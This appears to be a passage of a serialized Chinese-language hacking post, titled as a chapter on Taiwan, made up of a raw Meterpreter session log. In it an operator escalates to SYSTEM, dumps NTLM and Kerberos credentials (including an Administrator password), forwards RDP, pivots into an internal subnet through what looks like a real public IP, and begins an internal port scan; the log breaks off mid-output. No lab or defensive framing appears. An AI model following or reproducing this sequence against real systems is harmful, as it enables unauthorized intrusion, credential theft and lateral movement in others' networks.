【连载】第一章:亚洲-台湾(1)

2024年5月26日发(作者：)

3380 376 x86 0 xxxxxxxxxxxxAdministrator C:

meterpreter > migrate 2128

Migrating from 3104

Migration completed successfully.

meterpreter > getsystem

...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).

meterpreter > getuid

Server username: NT AUTHORITYSYSTEM

meterpreter > msv

[+] Running as SYSTEM

Retrieving msv credentials

msv credentials

===============

AuthID Package Domain User Password

------ ------- ------ ---- --------

0;109205 NTLM xxxxxxxxxxxx Administrator lm{ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx }, ntlm{ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx }

0;996 Negotiate NT AUTHORITY NETWORK SERVICE lm{ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx }, ntlm{ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx }

0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO)

0;54469 NTLM n.s. (Credentials KO)

0;999 NTLM WORKGROUP xxxxxxxxxxxx$ n.s. (Credentials KO)

meterpreter > kerberos

[+] Running as SYSTEM

Retrieving kerberos credentials

kerberos credentials

====================

AuthID Package Domain User Password

------ ------- ------ ---- --------

0;996 Negotiate NT AUTHORITY NETWORK SERVICE

0;997 Negotiate NT AUTHORITY LOCAL SERVICE

0;54469 NTLM

0;999 NTLM WORKGROUP xxxxxxxxxxxx$

0;109205 NTLM xxxxxxxxxxxx Administrator 123456

meterpreter > portfwd add -l 3389 - -p 3389 #IP已做处理

Local TCP relay created: :3389 <-> :3389

meterpreter > portfwd

Active Port Forwards

====================

Index Local Remote Direction

----- ----- ------ ---------

1 0.0.0.0:3389 :3389 Forward

1 total active port forwards.

root@xxxx:/# rdesktop 127.0.0.1:3389

Autoselected keyboard map en-us

Failed to negotiate protocol, retrying with plain RDP.

WARNING: Remote desktop does not support colour depth 24; falling back to 16

meterpreter > run autoroute -h

Usage: run autoroute [-r] -s subnet -n netmask

Examples:

run autoroute -s 10.1.1.0 -n 255.255.255.0 # Add a route to 10.10.10.1/255.255.255.0

run autoroute -s 10.10.10.1 # Netmask defaults to 255.255.255.0

run autoroute -s 10.10.10.1/24 # CIDR notation is also okay

run autoroute -p # Print active routing table

run autoroute -d -s 10.10.10.1 # Deletes the 10.10.10.1/255.255.255.0 route

Use the "route" and "ipconfig" Meterpreter commands to learn about available routes

[-] Deprecation warning: This script has been replaced by the post/windows/manage/autoroute module

meterpreter > ifconfig

Interface 1

============

Name : MS TCP Loopback interface

Hardware MAC : 00:00:00:00:00:00

MTU : 1520

IPv4 Address : 127.0.0.1

Interface 2

============

Name : Broadcom NetXtreme Gigabit Ethernet - McAfee NDIS Intermediate Filter Miniport

Hardware MAC : 00:11:25:40:77:8f

MTU : 1500

IPv4 Address : 10.23.255.3

IPv4 Netmask : 255.255.255.0

meterpreter > run autoroute -s 10.23.255.3 -n 255.255.255.0

Adding a route to 10.23.255.3/255.255.

[+] Added route to 10.23.255.3/255.255.255.0 via 61.57.243.227

Use the -p option to list all active routes

meterpreter > run autoroute -p

Active Routing Table

====================

Subnet Netmask Gateway

------ ------- -------

10.23.255.3 255.255.255.0 Session 3

meterpreter > ifconfig

Interface 1

============

Name : MS TCP Loopback interface

Hardware MAC : 00:00:00:00:00:00

MTU : 1520

IPv4 Address : 127.0.0.1

Interface 2

============

Name : Broadcom NetXtreme Gigabit Ethernet - McAfee NDIS Intermediate Filter Miniport

Hardware MAC : 00:11:25:40:77:8f

MTU : 1500

IPv4 Address : 10.23.255.3

IPv4 Netmask : 255.255.255.0

meterpreter >

Background session 3? [y/N]

msf auxiliary(tcp) > use auxiliary/scanner/portscan/tcp

msf auxiliary(tcp) > show options

Module options (auxiliary/scanner/portscan/tcp):

Name Current Setting Required Description